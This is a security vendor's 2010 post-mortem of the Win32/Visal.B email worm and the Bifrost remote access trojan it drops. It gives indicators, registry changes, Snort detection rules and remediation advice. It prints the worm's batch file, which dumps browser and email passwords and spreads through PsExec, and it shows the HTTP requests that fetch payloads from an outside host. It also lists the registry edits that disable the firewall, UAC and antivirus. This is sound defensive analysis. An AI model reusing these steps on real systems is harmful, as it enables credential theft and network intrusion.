0 Results Found
              Back To Results
                Threat Analysis

                Win32/Visal.B Email Worm Post-Mortem Analysis

                By: Counter Threat Unit Research Team
                • Date: September 22, 2010
                • Author: SecureWorks' Counter Threat Unit™

                Summary

                On September 9, 2010, the SecureWorks Counter Threat Unit™ (CTU) received reports of a possible worm propagating through email messages. These email messages were reported to have a subject of "Here you have" and contained links to download what appeared to be a PDF (Portable Document Format) file. In actuality, the link would download a Windows Executable file. This file was commonly identified (29/43) by antivirus software vendors as Win32/Visal.B, W32/Imsolk.B, and W32/VBMania. This analysis focuses on a post-mortem analysis of a computer infected with this threat to provide guidance for organizations to identify compromised assets and assess damages.

                Email Characteristics

                Figure 1 provides an example of what an email sent by this malware might look like.


                Figure 1. Example Email.

                The link in the message body is a decoy. It actually references a URL hosted on a free webhosting provider in the United Kingdom (UK). The actual URL is for a file with an ".scr" extension typically used by Microsoft Windows Screen Saver programs. An SCR file is a standard Microsoft Window executable.

                Sample Characteristics

                In Table 1, CTU has identified a single executable file responsible for the initial infection.

                MD5 2bde56d8fb2df4438192fb46cd0cc9c9
                SHA1 0ba8387faaf158379712f453a16596d2d1c9cfdc
                File Size 290816 bytes
                File Type PE32 executable for MS Windows (GUI) Intel 80386 32-bit

                Table 1. Sample characteristics.

                Win32 Visal.B Analysis

                CTU analysis of this malware confirmed that its primary purpose was to download additional executables, spread itself to additional computers via email, Windows file shares, domain credentials, and USB autorun, and weaken the overall security posture of the computer.

                Win32/Visal.B uses HTTP (Hypertext Transfer Protocol) to attempt to download and execute files from several links hosted on a free webhosting site run by Lycos UK. A typical HTTP request would look like:

                 
                GET /yahoophoto/ff.iq HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: members.multimania.co.uk
                Connection: Keep-Alive
                

                All of the requested URLs end with the .iq suffix. The downloaded executables are saved in the %systemroot% folder (e.g. c:\WINDOWS), with the .iq suffix changed to .exe. CTU analyzed the sample and was able to correlate these results with findings from other security researchers to determine the following files would be downloaded and installed on an infected computer. Table 2 shows the attributes for the downloaded files and additional files installed by the malware.

                File Path MD5 Type Size (bytes)
                c:\WINDOWS\csrss.exe 2bde56d8fb2df4438192fb46cd0cc9c9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 290816
                c:\WINDOWS\op.exe 37a89021ab1fbe5668c3974abc794bd4 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 39424
                c:\WINDOWS\pspv.exe 35861f4ea9a8ecb6c357bdb91b7df804 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 52736
                c:\WINDOWS\tryme1.exe 7dac073c9966dec34c523f95f7ec07a9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 57970
                c:\WINDOWS\ff.exe ac5808334832032b0e7df1a2351e207f PE32 executable for MS Windows (GUI) Intel 80386 32-bit 38400
                c:\WINDOWS\gc.exe 9b3b1c0db965166319469b2afa6c4f0c PE32 executable for MS Windows (GUI) Intel 80386 32-bit 128000
                c:\WINDOWS\ie.exe 21e55f6bbe6bd753faf348dc12e38353 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 44032
                c:\WINDOWS\im.exe 4b0f8add6c696cefe2746b6372a09034 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 65536
                c:\WINDOWS\m.exe 60e5a03029eac3972550507e96ee4b83 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 51200
                c:\WINDOWS\w.exe 862dfc205db452c3c5127b1c721ec1a8 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 48128
                c:\WINDOWS\rd.exe f3ca95a762a4101a2cd5789190681a78 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 33280
                c:\WINDOWS\re.exe 52f29041d8d151964e904a8d4d0e2677 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 129400
                c:\WINDOWS\system32\drivers\etc\hosts fe1f2ddf56663e55ea5a6c48c4660908 Data 44981
                c:\WINDOWS\vb.vbs e9552b3f2a5da01805015669fe9b7091 ASCII text, with CRLF line terminators 1728
                c:\WINDOWS\system32\SendEmail.dll 6af5491540b35ea502aadde3a358e2c9 PE32 executable for MS Windows (DLL) Intel 80386 32-bit 309992
                c:\autorun.inf 323d9773a5dc9efb4623abd1e5c78ce1 ASCII text, with CRLF line terminators 167
                c:\open.exe 2bde56d8fb2df4438192fb46cd0cc9c9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 290816

                Table 2. List of files downloaded by Win32/Visal.B.

                File Analysis

                Most of the downloaded programs have been identified as password recovery tools for specific web browser and email client programs. Developed by NirSoft, a freeware web site operated by an individual software developer, these tools are promoted as utilities to recover lost or forgotten passwords and are not typically considered malicious by themselves. None of these tools analyzed by CTU had the ability to exfiltrate data via the network. However, many of these tools do provide the means to produce output to files. Win32/Visal.B attempts to create and execute a batch file named b.bat. This batch file runs these downloaded programs with a command line option to send the output to a text file. Win32/Visal.B will then attempt to email the output files to an email address hardcoded in the malware.

                Contents of b.bat:

                 
                ff.exe /stext "C:\WINDOWS\ff.dlm"
                gc.exe /stext "C:\WINDOWS\gc.dlm"
                ie.exe /stext "C:\WINDOWS\ie.dlm"
                im.exe /stext "C:\WINDOWS\im.dlm"
                op.exe /stext "C:\WINDOWS\op.dlm"
                pspv.exe /stext "C:\WINDOWS\pspv.dlm"
                rd.exe /stext "C:\WINDOWS\rd.dlm"
                w.exe /stext "C:\WINDOWS\w.dlm"
                m.exe /stext "C:\WINDOWS\m.dlm"
                del *.exe
                Copy /b /y SendEmail.dll %SystemRoot%\System32\*.*
                regsvr32 %SystemRoot%\System32\SendEmail.dll
                re.exe \\* -c \\INFECTEDCOMP\updates\updates.exe
                

                The re.exe tool has been identified as PsExec, a utility distributed by Microsoft SysInternals group used for running applications on remote systems. INFECTEDCOMP is the name of the infected computer and "updates" is the name of a network share that the malware attempts to create and to copy itself. If the logged in user had administrator credentials for the domain, then these permissions could cause the malware to spread to every computer in the domain.

                Table 3 maps the observed password recovery utilities downloaded by Win32/Visal.B to the corresponding NirSoft utility.

                File Name Tool Name Client Location
                ie.exe IE PassView Internet Explorer http://www.nirsoft.net/utils/internet_explorer_password.html
                ff.exe PasswordFox Firefox http://www.nirsoft.net/utils/passwordfox.html
                op.exe OperaPassView Opera http://www.nirsoft.net/utils/opera_password_recovery.html
                pspv.exe Protected Storage PassView Microsoft Protected Storage http://www.nirsoft.net/utils/pspv.html
                im.exe MessenPass MSN Messenger/Yahoo Messenger/GoogleTalk/AOL IM/other IM clients http://www.nirsoft.net/utils/mspass.html
                m.exe Mail Passview Outlook/Outlook Express/Eudora/Thunderbird/other email clients http://www.nirsoft.net/utils/mailpv.html
                w.exe WirelessKeyView WEP/WPA passwords http://www.nirsoft.net/utils/wireless_key.html
                gc.exe ChromePass Google Chrome http://www.nirsoft.net/utils/chromepass.html
                rd.exe Remote Desktop PassView Microsoft Remote Desktop http://www.nirsoft.net/utils/remote_desktop_password.html

                Table 3. Inventory of password recovery utilities.

                csrss.exe

                This file is a copy of the original Win32/Visal.B executable. The malware may copy itself to several other directories in its attempt to spread via USB autorun and Windows file shares (e.g. c:\open.exe).

                Additionally, Win32/Visal.B may create copies of itself in various directories with the pattern " CV 2010.exe".

                hosts

                Win32/Visal.B attempts to download the hst.iq file, intended as a replacement for the Windows local hosts file. Windows may use the local hosts file to locally resolve domains to IP addresses. This version of the local hosts file attempts to force domains belonging to several antivirus and antimalware products to resolve to bogus IP addresses. If successful, then these tools could be prevented from contacting their update sites to receive updated signatures.

                SendEmail.dll

                This is an email sending module used by Win32/Visal.B to send emails. This DLL (Dynamic Link Library) is a publicly available module from http://www.4shared.com/file/199140856/ed929f06/SendEmail20.html. The b.bat file created and executed by Win32/Visal.B copies this DLL into the %SystemRoot%\System32 folder and calls regsvr32 to register it.

                vb.vbs

                This is a VBScript file that is dropped and executed by the malware in an attempt to copy itself to all remote computers within WinNT://Workgroup. CTU analysis of this file shows that it may not function correctly. If it did, it attempts to copy itself to the following paths:

                 
                		\d\N73.Image12.03.2009.JPG.scr
                		\c\N73.Image12.03.2009.JPG.scr
                		\New Folder\N73.Image12.03.2009.JPG.scr
                		\music\N73.Image12.03.2009.JPG.scr
                		\print\N73.Image12.03.2009.JPG.scr
                		\E\N73.Image12.03.2009.JPG.scr
                		\F\N73.Image12.03.2009.JPG.scr
                		\G\N73.Image12.03.2009.JPG.scr
                		\H\N73.Image12.03.2009.JPG.scr
                

                autorun.inf

                Autorun file used to spread the infection via the USB (Universal Serial Bus) and other removable devices.

                tryme1.exe

                CTU analysis of this file shows that it is a version of a Remote Access Trojan (RAT) known as Bifrost. This version of Bifrost is currently detected by most (40/42) antivirus vendors. See the 'Bifrost Analysis' later in this paper for more information.

                Win32/Visal.B Registry Activity

                Win32/Visal.B attempts to change the Windows Shell registry setting to force itself to start at each login.

                Key Value Data
                HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Explorer.exe C:\WINDOWS\csrss.exe

                Table 4. Registry changes for Win32/Visal.B startup.

                Win32/Visal.B also attempts to add several registry key entries in an attempt to lower the security posture of an infected computer.

                Disable Windows Firewall:

                Key Value Data
                HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile EnableFirewall 0

                Table 5. Registry changes to disable Windows Firewall.

                Win32/Visal.B adds the following registry entries to allow SMB (Server Message Block) traffic. SMB, often known as "Windows Networking", provides shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.

                Key Value Data
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                137:UDP 137:UDP:*:Enabled:@xpsp2res.dll,-22001
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                138:UDP 138:UDP:*:Enabled:@xpsp2res.dll,-22002
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                139:TCP 139:TCP:*:Enabled:@xpsp2res.dll,-22004
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                445:TCP 445:TCP:*:Enabled:@xpsp2res.dll,-22005
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                137:UDP 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                138:UDP 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                139:TCP 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
                HKLM\system\ControlSet001\Services\SharedAccess\
                Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
                445:TCP 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005

                Table 6. Registry additions to allow SMB traffic.

                With these registry additions, Win32/Visal.B instructs Windows Explorer to not show hidden system files:

                Key Value Data
                HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden 2
                HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced SuperHidden 0
                HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden 0

                Table 7. Registry additions to hide system files.

                Turn off Outlook security warning dialog box:

                Key Value Data
                HKLM\software\Microsoft\Office\12.0\Outlook\Security ObjectModelGuard 2

                Table 8. Registry additions to disable security warnings.

                Disable Windows User Account Control (UAC):

                Key Value Data
                HKLM\software\Microsoft\Windows\CurrentVersion\policies\system EnableLUA 0
                HKLM\software\Microsoft\Windows\CurrentVersion\policies\system EnableVirtualization 0
                HKLM\software\Microsoft\Windows\CurrentVersion\policies\system PromptOnSecureDesktop 0

                Table 9. Registry additions to disable Windows UAC.

                Attempt to create a network share named "updated" to allow the malware to spread:

                Key Value Data
                HKLM\system\ControlSet001\Services\lanmanserver\Shares updates CSCFlags=0[0x00]MaxUses=100[0x00]Path=
                C:\WINDOWS\system[0x00]Permissions=0[0x00]Remark=
                Public share for update.[0x00]Type=0[0x00][0x00]

                Table 10. Registry changes to create a network share.

                Win32/Visal.B adds numerous values within the software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ registry key. For example:

                Key Value Data
                HKLM\software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com Debugger csrss.exe

                Table 11. Example of a registry addition intended to inhibit security software.

                This additional key causes a copy of the malware to be started instead of the application listed in the registry key (in this example, 00hoeav.com). Win32/Visal.B uses this technique to prevent program names matching various security applications from executing. Appendix A contains the full list of targeted applications.

                Additional Win32/Visal.B Behavior

                The Win32/Visal.B malware attempts to terminate the following processes if they are currently running:

                • Usbguard.exe
                • CPE17AntiAutoruna.exe
                • outlook.exe

                It will also attempt to delete files in these directories:

                 
                
                • C:\Program Files\USB Disk Security\
                • D:\Program Files\USB Disk Security\

                Win32/Visal.B attempts to stop and then disable several Windows services belonging to antivirus and other host-based security products. See Appendix B for the complete list.

                Visal Email Worm History

                The CTU has seen evidence that there was at least one earlier instance of this malware campaign. CTU was able to find another piece of malware that was executed in its TRUMAN automated malware analysis system on August 5, 2010 that exhibited nearly identical behavior. Antivirus identification (40/43) of this malware identified it as Win32/Visal.A and Imsolk.

                The primary difference of this version of the malware is this it uses a different web hosting account. Win32/Visal.A attempted to download its secondary payloads from an account named "iqreporters".

                 
                GET /iqreporters/ie.iq HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: members.multimania.co.uk
                Connection: Keep-Alive
                

                Bifrost Analysis

                The Bifrost RAT (Remote Access Trojan) downloaded by Win32/Visal.B provides an attacker with the ability to remotely view and control several aspects of an infected system, including:

                • Browse filesystem
                • Create and remove directories
                • Search for files by pattern
                • Upload and download files
                • Execute files on remote system
                • View and kill running processes
                • Capture screenshots of the infected computer's desktop
                • Log user keystrokes
                • View and modify the Windows Registry
                • Manipulate an attached webcam
                • Open a remote shell to the infected computer to run additional commands

                As is common with RATs, Bifrost uses a GUI that runs on an attacker's computer to view and manage infected computers. Figure 2 shows an example of a Bifrost management GUI (Graphical User Interface) with an infected computer connected.

                Figure 2. Bifrost Management GUI.

                Figure 3 shows the File Manager capability:

                Figure 3. Bifrost File Manager.

                This version of Bifrost also includes an additional module designed for stealing passwords from the Microsoft Protected Storage (Protected Storage provides applications with an interface to store user data that must be kept secure or free from modification), several email clients, and for stealing license keys from popular computer software packages and games.

                Bifrost File Behavior

                The Bifrost sample installed by Win32/Visal.B was observed making the following file changes:

                File Path MD5 File Type Size (Bytes)
                c:\Documents and Settings\owner\Application Data\addons.dat 902591674a0e7d0143418aab50977ff4 data 25292
                c:\WINDOWS\system32\systems\logg.dat <variable> data <variable>
                c:\WINDOWS\system32\systems\svchosts.exe 7dac073c9966dec34c523f95f7ec07a9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 57970

                Table 12. Registry additions made by the Bifrost malware.

                addons.dat

                An encrypted module for Bifrost that implements the password and software license key stealing capability mentioned earlier in this section.

                logg.dat

                The log file Bifrost uses to store keystrokes collected by its keylogger capability. The keylogger functionality in this version of Bifrost was enabled by default.

                svchosts.exe

                The Bifrost trojan copies itself to this location the first time it executes.

                Bifrost Registry Behavior

                Bifrost makes the following registry changes:

                Key MD5 Value Data
                HKCU\Software\Bifrost klg [0x01]
                HKCU\Software\Bifrost plg1

                [0xea]D[0xdc][0x02][0xa3]'[0xd7]_[0x11][0xad][0xb9][0x07][0xda][0xf2]5[0x03]*5[0x8e]X
                [0x1b][0x0e][0x11][0x94][0xd4][0xf9][0x12][0x1b][0x1a]Z[0xa4][0x81][0xfe]qh[0xa3][0xd4]
                [0xea][0xb4][0xa7])[0xb3]_[0xa4]>[0xa9]#[0x8a][0x85]i[0x01]u[0x9e][0x9b]O[0x1e][0x8b]sC
                [0x16]a[0xca][0xae][0x05][0xea]Iv[0xf7]5-[0xf3]!h[0x12]-[0x84][0x01]A[0x0f][0xf6]n[0x09]!b
                QY[0xe0][0xef]!([0xc5][0xf3],[0xce][0xf6]1Wju[0xc6]rU[0xd5][0xfd][0xe3][0x11][0xcf][0x02]
                *?[0xeb]\[0xdb][0xfe]\=[0xc8][0x0d]Sg[0xf7][0x88]'[0x09]k[0x98][0xf0]7[0xdd][0x00][0x93]B
                [0xa5]y>6[0x86][0xbe][0xb2][[0x99][0xd8]E[0x12][0x96]B[0xb7]a[0x11],[0xe7][0x18][0x95]
                [0xd1][0x97]&[0x05]D[0xba][0xe3][0xe1]s[0x99][0xed][0xee][0x1d][0xe9][0xe5]Dc[0xb3]
                [0xc3][0xfd][0x87]^[0x97]N[0xe8]8[0xe8][0xfe]P[0xd8][0xb1]R[0x89][0xf9]5d[0xb2]Du=
                [0x12][0xae][0xe8][0xb3][0xdb][0xeb][0xd0][0xa8][0xc5][0xef]?[0xd2][0xcb][0xa2]WsL
                [0xd8][0xc2]8#[0x82][0xd4][0x04][0xd1]90V[0xd5]!g[0x93][0x89]*[0xfe]D[0x8d][0xfd]
                [0xc3][0xce][0xef][0x8f]4[0xb1]([0xd9][0x0c]4)[0xce]Q^[0xe3]M4[0xfb][0xbe]t[0xcd]@6:
                [0xd8]j[0x8f]A

                HKCU\software\Bifrost nck [0xe8][0x12][0xec]'[0xa4][0x05][0xc9]P[0x06][0xc3][0xcd]t[0xfa][0x93][g
                software\Microsoft\Active Setup\Installed Components\{9D71D88C-C598-4935-C5D1-43AA4DB90836} stubpath C:\WINDOWS\system32\systems\svchosts.exe s[0x00]

                Table 13. Registry additions made by the Bifrost malware.

                Bifrost uses the stubpath entry to establish permanence on the infected computer. Programs listed under the Active Setup key are automatically executed at login. If the user initially running the Bifrost trojan has Administrator privileges, then this key is written under HKEY_LOCAL_MACHINE and Bifrost will start up for all users. If the initial user does not have Administrator privileges, then this key is written under HKEY_CURRENT_USER and only start up when that user logs in.

                Bifrost Network Behavior

                Bifrost uses a custom protocol to communicate with the GUI on the attacker's computer. This protocol is TCP-based and the remote host and port number can be custom configured for each build of the malware. The version dropped by Win32/Visal.B was configured to connect to the tarekbinziad.no-ip.biz domain on TCP port 2003. CTU observed this domain resolving to the IP address 92.41.61.61 before the domain was taken offline by the dynamic DNS provider.

                Recent versions of Bifrost support the use of a TOR plugin and TOR hidden services to attempt to hide the remote server. TOR is free software used to communicate anonymously on the Internet. This version of Bifrost supports the TOR plugin but did not include it.

                Bifrost Process Behavior

                Bifrost supports various options and plugins for stealth, including rootkit capabilities. This build of Bifrost did not utilize these rootkit capabilities. Its primary stealth mechanism is to create an instance of an Internet Explorer process that is not visible, and then inject its primary code into that process. While there is no visible IE window, it will still be present in the Task Manager (see Figure 4).

                Figure 4. Bifrost IE process in task list.

                The powerful capabilities of the Bifrost trojan make it a significant threat on a network, as it allows an attacker almost full access to a compromised computer and the information stored within. A factor that may mitigate the threat in this instance is that the Bifrost GUI was not built to scale to handle a large number of infected computers. In addition, the attacker using a mobile broadband connection may have caused his bandwidth to become saturated due to a potentially large number of infected hosts attempting to connect to the control GUI. This constraint may have reduced the number of infected computers successfully connecting to the remote host and exfiltrating stolen data.

                Recommendations

                Detection

                CTU recommends monitoring networks for activity indicative of Win32/Visal.B infection. There are various stages of the infection process where detection is possible.

                Initial HTTP download request

                The emails sent by Win32/Visal.B attempt to obfuscate the URL hosting the malware by displaying one of the following URLs in the HTML markup:

                 
                www[dot]sharedocuments[dot]com/library/PDF_Document21.025542010.pdf
                www[dot]sharemovies[dot]com/library/SEX21.025542010.wmv
                

                However, the hyperlink actually points to this URL:

                 
                http://members[dot]multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
                

                Network IPS/IDS and/or web proxies should be configured to detect and/or block attempts to download these URLs. The following Snort rules can be used to detect attempts to download either the actual URL hosting the malware, or one of the decoy URLs:

                 
                alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/library/SEX21.025542010.wmv|20|HTTP/1."; distance:0; sid:xxx;)
                 
                alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/yahoophoto/PDF_Document21_025542010_pdf.scr|20|HTTP/1."; distance:0; nocase; sid:xxx;)
                 
                alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/library/PDF_Document21.025542010.pdf|20|HTTP/1."; distance:0; nocase; sid:xxx;)
                

                Post-Infection Malware Download

                Win32/Visal.B attempts to download multiple executable files from the Internet. These requests have unique attributes that can be easily detected. The following Snort rule can be used:

                 
                alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Visal.B Email Worm Malware Download"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:".iq|20|HTTP/1.1"; distance:1; content:"|0D 0A|User-Agent|3A 20|Mozilla|2F|4.0|20 28|compatible|3B 20|Win32|3B 20|WinHttp.WinHttpRequest.5|29|"; distance:0; content:"|0D 0A|Accept|3A 20|*/*"; content:!"Referer|3A|"; nocase; content:!"|0D 0A|Accept-Language|3A|"; nocase; content:!"|0D 0A|Accept-Encoding|3A|"; nocase; content:!"|0D 0A|Accept-Charset|3A|"; nocase; content:!"|0D 0A|Keep-Alive|3A|"; nocase; sid:xxx;)
                 
                

                Bifrost Phone Home

                The Bifrost RAT installed by Win32/Visal.B attempts to phone home to a single host that is hardcoded in the malware. Organizations should monitor DNS activity for requests for the tarekbinziad.no-ip.biz domain that may indicate the system has been compromised with Win32/Visal.B and the Bifrost RAT. While that domain has been shut down, organizations with the ability to monitor their firewall logs can search for connection attempts to the IP address 92.41.61.61 on TCP/2003 to identify compromised systems.

                Remediation

                Win32/Visal.B can significantly alter the security posture of a compromised system, even if the malware or the system is unsuccessful in downloading malware files from the Internet. Given the magnitude of the registry and file changes made to the system in addition to any additional malware installed, CTU recommends that compromised systems be formatted and the Operating System and applications reinstalled from known-good media.

                Organizations should also consider the potential compromise of any stored credentials for email and HTTP accounts and initiate appropriate remediation steps based on their risk calculations.

                Prevention

                In addition to network-based monitoring and detection, CTU recommends the following steps to help protect your organization from this and future threats.

                • Avoid clicking links in email messages.

                  Advise users to not click links in email messages, especially in messages from unknown or untrusted sources. Note that users cannot determine if an email link is safe simply by examining the link. Web servers can be configured to redirect the user or deliver benign content besides that indicated by the filename extension used in the link. Verify links and attachments from trusted sources before opening them.

                • Disable AutoRun.

                  If feasible, disable AutoRun functionality according to the instructions in Microsoft Knowledge Base article KB967715, available here:

                  http://support.microsoft.com/kb/967715

                • Limit user privileges.

                  Do not log in as a privileged or administrative user to perform routine computer tasks. The WMI (Windows Management Instrumentation) and psexec vectors used by this worm generally require administrator rights to work according to the attacker's design.

                • Secure WMI.

                  A technical article describing how to secure WMI (Windows Management Instrumentation) can be found on the Microsoft Developer Network, available at:
                  http://msdn.microsoft.com/en-us/library/aa392291%28VS.85%29.aspx

                • Update host and gateway antivirus product signatures.

                  Several corporate antivirus engines detect some of the payloads associated with this threat. SecureWorks has provided samples of all related malware files to all major antivirus vendors. If antivirus signatures are not yet available, monitor or contact your antivirus vendor(s) for signature update availability.

                • Think twice before allowing your web browser to remember your passwords for you.

                  This worm uses legitimate password recovery and revealer applications as well as a backdoor capable of stealing passwords and digital certificates from web browsers. Malware has proven that default settings for password security in modern web browsers are ineffective. Additional settings, such as setting a master password, are needed to help mitigate this risk. Optionally, users may want to consider using password management programs instead of built-in browser functionality.

                Appendix A. List of security applications targeted by Win32/Visal.B

                00hoeav.com
                0w.com
                360rpt.ExE
                360safe.ExE
                360safebox.ExE
                360tray.ExE
                6.bat
                6fnlpetp.exe
                6x8be16.cmd
                BIOSREad.exe
                BdSurvey.exe
                CCenter.ExE
                CEmRep.ExE
                CMain.ExE
                CaVCmd.exe
                CaVCtx.exe
                CaVRep.exe
                CaVRid.exe
                CaVSCons.ExE
                CaVSubmit.ExE
                CavEmSrv.ExE
                CavMUd.ExE
                CavQ.ExE
                CavSn.ExE
                CavSub.ExE
                CavUMaS.ExE
                CavUserUpd.ExE
                CavaUd.ExE
                Cavapp.ExE
                Cavmr.ExE
                Cavoar.ExE
                Cavvl.ExE
                EMdISK.exe
                FPWin.exe
                FPaVServer.exe
                FProttray.exe
                FRW.ExE
                FileKan.exe
                FrameworkService.exe
                FrzState2k.exe
                GFUpd.ExE
                GetSI.dll
                GuardField.ExE
                Hijackthis.ExE
                ICLOad95.ExE
                ICLOadNt.ExE
                ICMON.ExE
                ICSUPP95.ExE
                ICSUPPNt.ExE
                IEShow.exe
                IFaCE.ExE
                IceSword.ExE
                Identity.exe
                InstLsp.ExE
                InstallCaVS.ExE
                Iparmor.ExE
                KPfwSvc.ExE
                KRegEx.ExE
                KVSrvxP.ExE
                KVWSC.ExE
                KaSaRP.ExE
                KaVPFW.ExE
                KeyMgr.exe
                MSGrc32.vbs
                McShield.exe
                McVSEscn.exe
                Mcdetect.exe
                Mctray.exe
                Mmsk.ExE
                MooLive.exe
                NaVW32.ExE
                NaVaPW32.ExE
                Navapsvc.ExE
                OnaccessInstaller.ExE
                PFW.ExE
                PSHost.exe
                PaVSRV51.ExE
                Pagent.exe
                Pagentwd.exe
                PavFnSvr.exe
                PavReport.exe
                PsCtrlS.exe
                PsImSvc.exe
                QQdoctor.ExE
                QtnMaint.exe
                RStray.ExE
                RaV.ExE
                RaVtRaY.ExE
                RavStub.ExE
                Ravservice.ExE
                Rfwstub.ExE
                Runiep.ExE
                SCVHOSt.exe
                SCVHSOt.exe
                SCVVHOSt.exe
                SCVVHSOt.exe
                SOLOCFG.exe
                SOLOLItE.exe
                SOLOSCaN.exe
                SOLOSENt.exe
                SREngLdr.ExE
                SendLogs.exe
                Socksa.ex
                Sphinx.exe
                Spybotsd.exe
                UPSdbMaker.ExE
                UUpd.ExE
                UdaterUI.exe
                VPC32.ExE
                VPtRaY.ExE
                VSECOMR.ExE
                VSHWIN32.ExE
                VSStat.ExE
                Vba32ECM.exe
                Vba32PP3.exe
                Vba32Qtn.exe
                Vba32act.exe
                Vba32arkit.exe
                Vba32ifs.exe
                VetMsg.exe
                Visthaux.exe
                VstskMgr.exe
                WEBPROxY.ExE
                WEBSCaNx.ExE
                WOPtILItIES.ExE
                WinGrc32.dll
                WrCtrl.exe
                Wradmin.exe
                _aVP32.ExE
                _aVPCC.ExE
                _aVPM.ExE
                a2cmd.ExE
                a2free.ExE
                a2service.ExE
                a2upd.ExE
                aNtIaRP.ExE
                aNtS.ExE
                aPVxdWIN.ExE
                aVCONSOL.ExE
                aVENGINE.ExE
                aVP32.ExE
                aVPCC.ExE
                aVPM.ExE
                abk.bat
                adobe Gamma Loader.exe
                algsrvs.exe
                algssl.exe
                angry.bat
                anti-trojan.exe
                antihost.exe
                apu-0607g.xml
                apu.stt
                arSwp.ExE
                ashEnhcd.exe
                ashLogV.exe
                ashMaiSv.exe
                ashPopWz.exe
                ashQuick.exe
                ashServ.exe
                ashSkPcc.exe
                ashUpd.exe
                ashWebSv.exe
                ashdisp.exe
                ast.ExE
                aswBoot.exe
                aswRegSvr.exe
                aswUpdSv.exe
                autoRun.ExE
                autoRunKiller.ExE
                autorun.bin
                autorun.ini
                autorun.reg
                autorun.txt
                autorun.wsh
                autoruns.exe
                autorunsc.exe
                avMonitor.ExE
                avadmin.exe
                avastSS.exe
                avcenter.exe
                avciman.exe
                avconfig.exe
                avgamsvr.exe
                avgas.exe
                avgcc.exe
                avgcc32.exe
                avgemc.exe
                avginet.exe
                avgnt.exe
                avgrssvc.exe
                avgrsx.exe
                avgscan.exe
                avgscanx.exe
                avgserv.exe
                avguard.exe
                avgupsvc.exe
                avgw.exe
                avgwdsvc.exe
                avltd.exe
                avmailc.exe
                avnotify.exe
                avp.com
                avp.exe
                avscan.exe
                avzkrnl.dll
                bad1.exe
                bad2.exe
                bad3.exe
                bdagent.exe
                bdsubwiz.exe
                blackd.exe
                blackice.exe
                caiss.exe
                caissdt.exe
                catcache.dat
                cauninst.exe
                cavasm.ExE
                cavse.ExE
                ckahcomm.dll
                ckahrule.dll
                ckahum.dll
                cleaner.exe
                cleaner3.exe
                clldr.dll
                copy.exe
                curidsbase.kdz
                dF5Serv.exe
                destrukto.vbs
                diffs.dll
                drvins32.exe
                drwadins.exe
                drweb32w.exe
                drweb386.exe
                drwebscd.exe
                drwebupw.exe
                drwebwcl.exe
                drwreg.exe
                e.cmd
                e9ehn1m8.com
                edb.chk
                egui.exe
                ekrn.exe
                f0.cmd
                flashy.exe
                fpscan.exe
                fptrayproc.exe
                fs6519.dll.vbs
                fssf.exe
                fssync.dll
                fun.xls.exe
                g2pfnid.com
                guard.exe
                guardgui.exe
                guardxkickoff.exe
                guardxkickoff_x64.exe
                guardxservice.exe
                guardxup.exe
                h3.bat
                hookinst.exe
                host.exe
                i.bat
                iSafInst.exe
                iSafe.exe
                iamapp.exe
                iamserv.exe
                iefqwp.cmd
                ij.bat
                kav.bav
                kav32.ExE
                kavbase.kdl
                kavstart.ExE
                ker.vbs
                killVBS.vbs
                kissvc.ExE
                kl1.sys
                klavemu.kdl
                klbg.cat
                klbg.sys
                klif.cat
                klif.sys
                klim5.sys
                kmailmon.ExE
                kwatch.ExE
                licmgr.ex
                licreg.exe
                lky.exe
                lockdown2000.exe
